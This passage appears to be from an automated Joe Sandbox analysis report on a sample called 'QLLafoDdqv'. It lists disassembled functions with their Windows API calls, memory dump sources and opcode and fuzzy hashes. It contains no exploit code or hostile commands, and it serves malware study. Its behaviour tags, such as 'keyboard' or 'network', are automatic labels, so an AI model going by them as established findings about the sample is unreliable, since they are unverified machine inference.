              • WideCharToMultiByte.KERNEL32(00000000,00000000,007A1270,000000FF,?,0000003F,00000000,?), ref: 0070BC36
              • _free.LIBCMT ref: 0070BB7F
                • Part of subcall function 007029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0070D7D1,00000000,00000000,00000000,00000000,?,0070D7F8,00000000,00000007,00000000,?,0070DBF5,00000000), ref: 007029DE
                • Part of subcall function 007029C8: GetLastError.KERNEL32(00000000,?,0070D7D1,00000000,00000000,00000000,00000000,?,0070D7F8,00000000,00000007,00000000,?,0070DBF5,00000000,00000000), ref: 007029F0
              • _free.LIBCMT ref: 0070BD4B
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
              • String ID:
              • API String ID: 1286116820-0
              • Opcode ID: 7c7d7ddf5236eaf70b0799f9a9f70dbe2c4ac6f29027a869e3926a9fad197ab8
              • Instruction ID: 872fe7b4f56e26affa0f48dd98180a6c4461752e70c652df0ef9cc4b7f8ad31a
              • Opcode Fuzzy Hash: 7c7d7ddf5236eaf70b0799f9a9f70dbe2c4ac6f29027a869e3926a9fad197ab8
              • Instruction Fuzzy Hash: 79510571900209EFEB10EF659C85AAAB7F8FF81350F50436AE450D72E1EB789F418B64
              Function 0073E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 0073DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0073CF22,?), ref: 0073DDFD
                • Part of subcall function 0073DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0073CF22,?), ref: 0073DE16
                • Part of subcall function 0073E199: GetFileAttributesW.KERNEL32(?,0073CF95), ref: 0073E19A
              • lstrcmpiW.KERNEL32(?,?), ref: 0073E473
              • MoveFileW.KERNEL32(?,?), ref: 0073E4AC
              • _wcslen.LIBCMT ref: 0073E5EB
              • _wcslen.LIBCMT ref: 0073E603
              • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0073E650
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
              • String ID:
              • API String ID: 3183298772-0
              • Opcode ID: 2d7df6fed0f53378a84d9ff7156ea17c4e90b5152516c5bc573669ba4461a812
              • Instruction ID: 02cbf1f3057567ad04ac310bbafe162ade73db8a0de28b8cde86948f88b225c5
              • Opcode Fuzzy Hash: 2d7df6fed0f53378a84d9ff7156ea17c4e90b5152516c5bc573669ba4461a812
              • Instruction Fuzzy Hash: 655185B25083859BD764DB90DC819DF77ED9F84340F00491EF6C9D3192EF78A588876A
              Function 0075B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 006D9CB3: _wcslen.LIBCMT ref: 006D9CBD
                • Part of subcall function 0075C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0075B6AE,?,?), ref: 0075C9B5
                • Part of subcall function 0075C998: _wcslen.LIBCMT ref: 0075C9F1
                • Part of subcall function 0075C998: _wcslen.LIBCMT ref: 0075CA68
                • Part of subcall function 0075C998: _wcslen.LIBCMT ref: 0075CA9E
              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0075BAA5
              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0075BB00
              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0075BB63
              • RegCloseKey.ADVAPI32(?,?), ref: 0075BBA6
              • RegCloseKey.ADVAPI32(00000000), ref: 0075BBB3
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
              • String ID:
              • API String ID: 826366716-0
              • Opcode ID: 6d018a37206ca4c63a0d61ce5841cd133cadbff730644fd2756a29846960f23b
              • Instruction ID: 600d2c260b09e32b27a6b7555b8650f2cceb2eacb3074690977f666e6f2dee4a
              • Opcode Fuzzy Hash: 6d018a37206ca4c63a0d61ce5841cd133cadbff730644fd2756a29846960f23b
              • Instruction Fuzzy Hash: E861C271208241AFD314DF14C890E7ABBE5FF84308F14855DF8994B2A2DB75ED49CB92
              Function 00738BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
              Download Yara Rule
              APIs
              • VariantInit.OLEAUT32(?), ref: 00738BCD
              • VariantClear.OLEAUT32 ref: 00738C3E
              • VariantClear.OLEAUT32 ref: 00738C9D
              • VariantClear.OLEAUT32(?), ref: 00738D10
              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00738D3B
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Variant$Clear$ChangeInitType
              • String ID:
              • API String ID: 4136290138-0
              • Opcode ID: 25e429a72c5b7b9c90e7bd36870cba5aaca216c79db604f05e0c12ef6b1927c7
              • Instruction ID: be83457bb7a87ba22a21e248b5ec7bf40c83c5ef64bd65d69e4e20c4e7dab463
              • Opcode Fuzzy Hash: 25e429a72c5b7b9c90e7bd36870cba5aaca216c79db604f05e0c12ef6b1927c7
              • Instruction Fuzzy Hash: 4A5148B5A00219AFDB10CF68C884AAABBF4FF8D310F158559F915DB350EB34E911CBA1
              Function 00748AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON
              Download Yara Rule
              APIs
              • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00748BAE
              • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00748BDA
              • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00748C32
              • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00748C57
              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00748C5F
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: PrivateProfile$SectionWrite$String
              • String ID:
              • API String ID: 2832842796-0
              • Opcode ID: b86bd8bf148b02cba9dda58cb3e97686b741125748cf77a0500ec00b0c605fcf
              • Instruction ID: 9635f52530465e3d0e3cafd6b59a35548ab925787677d3e6ba7d22bbe5ff217a
              • Opcode Fuzzy Hash: b86bd8bf148b02cba9dda58cb3e97686b741125748cf77a0500ec00b0c605fcf
              • Instruction Fuzzy Hash: 67515D35A002199FCB45DF65C880E6DBBF6FF48314F088499E849AB362DB35ED41CBA5
              Function 00758EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
              Download Yara Rule
              APIs
              • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00758F40
              • GetProcAddress.KERNEL32(00000000,?), ref: 00758FD0
              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00758FEC
              • GetProcAddress.KERNEL32(00000000,?), ref: 00759032
              • FreeLibrary.KERNEL32(00000000), ref: 00759052
                • Part of subcall function 006EF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00741043,?,7644E610), ref: 006EF6E6
                • Part of subcall function 006EF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0072FA64,00000000,00000000,?,?,00741043,?,7644E610,?,0072FA64), ref: 006EF70D
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
              • String ID:
              • API String ID: 666041331-0
              • Opcode ID: 57a9ecce90e01b5e1216616bdd9693d8e421d65a591892b48d37a04d96ba8fe1
              • Instruction ID: a8a04b439705a8663272b93bcaafbaf0d1b033a4d8add5ab4e450daeb78476a7
              • Opcode Fuzzy Hash: 57a9ecce90e01b5e1216616bdd9693d8e421d65a591892b48d37a04d96ba8fe1
              • Instruction Fuzzy Hash: CA514A35A00205DFC745DF54C4948ADBBB1FF49315F088099ED0AAB3A2DB75ED89CB91
              Function 00766B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
              Download Yara Rule
              APIs
              • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00766C33
              • SetWindowLongW.USER32(?,000000EC,?), ref: 00766C4A
              • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00766C73
              • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0074AB79,00000000,00000000), ref: 00766C98
              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00766CC7
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Window$Long$MessageSendShow
              • String ID:
              • API String ID: 3688381893-0
              • Opcode ID: 2ae6c83b692c4fab29c30d2e5702685eb0ebae28efb1b318aec5671e1f4f9a1c
              • Instruction ID: 8e2a43304c3b4aca464fda7e4930e3718abd7d3debbe045aa26bf52c66b0b581
              • Opcode Fuzzy Hash: 2ae6c83b692c4fab29c30d2e5702685eb0ebae28efb1b318aec5671e1f4f9a1c
              • Instruction Fuzzy Hash: E141E235600504AFD725CF28CC48FA57BA5EB09350F954268EC9AA72A0C379BD40CA64
              Function 00702051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: _free
              • String ID:
              • API String ID: 269201875-0
              • Opcode ID: 6c0e1822d327b044fbdbf4d48a394b482efa80c14e2a0fb46491e7511a580de6
              • Instruction ID: 717a3d38f3b0a76fd539a1934feb05e6fd1f8bc575b02f3d5dfe20c238920c3e
              • Opcode Fuzzy Hash: 6c0e1822d327b044fbdbf4d48a394b482efa80c14e2a0fb46491e7511a580de6
              • Instruction Fuzzy Hash: F5419333A00304DFCB24DF78C885A59B7E5EF89314F1546A9E615EB392DA35AD02CB91
              Function 006E912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON
              Download Yara Rule
              APIs
              • GetCursorPos.USER32(?), ref: 006E9141
              • ScreenToClient.USER32(00000000,?), ref: 006E915E
              • GetAsyncKeyState.USER32(00000001), ref: 006E9183
              • GetAsyncKeyState.USER32(00000002), ref: 006E919D
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: AsyncState$ClientCursorScreen
              • String ID:
              • API String ID: 4210589936-0
              • Opcode ID: 0eda5e36a253d7be3392cee5c6fe967064d7198722622a1ddbd248f0828bfc85
              • Instruction ID: 97797849ca386c7e494e2613036b4a0810a48c0de4450d8f71e1b2f226d17847
              • Opcode Fuzzy Hash: 0eda5e36a253d7be3392cee5c6fe967064d7198722622a1ddbd248f0828bfc85
              • Instruction Fuzzy Hash: A7416E3190861AFBDF199F65D848BEEB775FF45320F208219E429A6290C7345D50CB61
              Function 00743874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
              Download Yara Rule
              APIs
              • GetInputState.USER32 ref: 007438CB
              • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00743922
              • TranslateMessage.USER32(?), ref: 0074394B
              • DispatchMessageW.USER32(?), ref: 00743955
              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00743966
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Message$Translate$AcceleratorDispatchInputPeekState
              • String ID:
              • API String ID: 2256411358-0
              • Opcode ID: 0005dff570550ebaee44bd682dfb8308285f8a00ad567535cd06bb89597ac496
              • Instruction ID: b0e53533a439444c0e536f4926ee93769234d1a33d9765992d95d730e36d990f
              • Opcode Fuzzy Hash: 0005dff570550ebaee44bd682dfb8308285f8a00ad567535cd06bb89597ac496
              • Instruction Fuzzy Hash: AF31D9709043419EFB35CB349C48BB777A8AB46308F54856DD4AAC20A0E3FCB685CB25
              Function 0074CF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
              Download Yara Rule
              APIs
              • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0074CF38
              • InternetReadFile.WININET(?,00000000,?,?), ref: 0074CF6F
              • GetLastError.KERNEL32(?,00000000,?,?,?,0074C21E,00000000), ref: 0074CFB4
              • SetEvent.KERNEL32(?,?,00000000,?,?,?,0074C21E,00000000), ref: 0074CFC8
              • SetEvent.KERNEL32(?,?,00000000,?,?,?,0074C21E,00000000), ref: 0074CFF2
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
              • String ID:
              • API String ID: 3191363074-0
              • Opcode ID: 4be5ec16aa9b428c940686044d9e3de1e5e7287b0cbed6263942fa90b92832ec
              • Instruction ID: 27fa84bd04711c806bc02e1d4ad49df109c0b73f08f2853845a498e5b947c5cb
              • Opcode Fuzzy Hash: 4be5ec16aa9b428c940686044d9e3de1e5e7287b0cbed6263942fa90b92832ec
              • Instruction Fuzzy Hash: 51317C72601305EFDB61DFA5C884AABBBF9EF14310B10842EF546D2101EB78AE459B60
              Function 00731901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
              Download Yara Rule
              APIs
              • GetWindowRect.USER32(?,?), ref: 00731915
              • PostMessageW.USER32(00000001,00000201,00000001), ref: 007319C1
              • Sleep.KERNEL32(00000000,?,?,?), ref: 007319C9
              • PostMessageW.USER32(00000001,00000202,00000000), ref: 007319DA
              • Sleep.KERNEL32(00000000,?,?,?,?), ref: 007319E2
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: MessagePostSleep$RectWindow
              • String ID:
              • API String ID: 3382505437-0
              • Opcode ID: cceb56a4551262e3719a040504c5f4dc050b1b1d3e4e0923e453078d42f7cb51
              • Instruction ID: a5c205be8fb9ab9880f33f60ce73bd598c9f5e64d999ffce5ecbab432bc6bfd2
              • Opcode Fuzzy Hash: cceb56a4551262e3719a040504c5f4dc050b1b1d3e4e0923e453078d42f7cb51
              • Instruction Fuzzy Hash: 9631F471900259EFDB04CFA8CD99BEE3BB5EB04315F008225F962A72D1C7B4AD54CB90
              Function 00765706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
              Download Yara Rule
              APIs
              • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00765745
              • SendMessageW.USER32(?,00001074,?,00000001), ref: 0076579D
              • _wcslen.LIBCMT ref: 007657AF
              • _wcslen.LIBCMT ref: 007657BA
              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00765816
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: MessageSend$_wcslen
              • String ID:
              • API String ID: 763830540-0
              • Opcode ID: c56fccd2390b1608f7fd3c59cf3d08263af5de9dd5debd94e180cbc6ee1856e3
              • Instruction ID: e8bb39a81be21ff17bb14079e961dfb9db618231dd52df418a628665d0e57ac0
              • Opcode Fuzzy Hash: c56fccd2390b1608f7fd3c59cf3d08263af5de9dd5debd94e180cbc6ee1856e3
              • Instruction Fuzzy Hash: CF21B671904618DADB218F60CC84EEE7BB8FF04724F108256FD2AEB180DB789985DF54
              Function 00750930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
              Download Yara Rule
              APIs
              • IsWindow.USER32(00000000), ref: 00750951
              • GetForegroundWindow.USER32 ref: 00750968
              • GetDC.USER32(00000000), ref: 007509A4
              • GetPixel.GDI32(00000000,?,00000003), ref: 007509B0
              • ReleaseDC.USER32(00000000,00000003), ref: 007509E8
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Window$ForegroundPixelRelease
              • String ID:
              • API String ID: 4156661090-0
              • Opcode ID: 70265cd338f37e37eddcc7679fc4e11f12472575aa2801272c9e6592f91a0fa0
              • Instruction ID: 2fb4971eca20e1512e629438959a9b3dce577d6958720b4a98b43d46169058c9
              • Opcode Fuzzy Hash: 70265cd338f37e37eddcc7679fc4e11f12472575aa2801272c9e6592f91a0fa0
              • Instruction Fuzzy Hash: D1216F39A00214AFD704EF69D888AAEBBE5EF44701F04806DE84A97352DBB4AC44CB94
              Function 0070CDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON
              Download Yara Rule
              APIs
              • GetEnvironmentStringsW.KERNEL32 ref: 0070CDC6
              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0070CDE9
                • Part of subcall function 00703820: RtlAllocateHeap.NTDLL(00000000,?,007A1444,?,006EFDF5,?,?,006DA976,00000010,007A1440,006D13FC,?,006D13C6,?,006D1129), ref: 00703852
              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0070CE0F
              • _free.LIBCMT ref: 0070CE22
              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0070CE31
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
              • String ID:
              • API String ID: 336800556-0
              • Opcode ID: bc334f34cb0823fc2148986ec011a0f0ab30fc053e480e935293b7c0b2a16d41
              • Instruction ID: 1d8b40084f448f41674e7b876d3f22ed77bb306853f5ff899252e2e348ffdd65
              • Opcode Fuzzy Hash: bc334f34cb0823fc2148986ec011a0f0ab30fc053e480e935293b7c0b2a16d41
              • Instruction Fuzzy Hash: 8701B1B2601215FFA32327B6EC8CC7B79ADDAC6BA1315432DFD05C6281EA688D0191B4
              Function 006E9639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON
              Download Yara Rule
              APIs
              • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 006E9693
              • SelectObject.GDI32(?,00000000), ref: 006E96A2
              • BeginPath.GDI32(?), ref: 006E96B9
              • SelectObject.GDI32(?,00000000), ref: 006E96E2
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ObjectSelect$BeginCreatePath
              • String ID:
              • API String ID: 3225163088-0
              • Opcode ID: 46c29ee6f40aae3392edb36b7141924725b29e81600343922eb0383382c791a5
              • Instruction ID: 6c299a65f9e98662d87077cd5ab1a609d993ca6e2346c04ad1c3d9eb647e117b
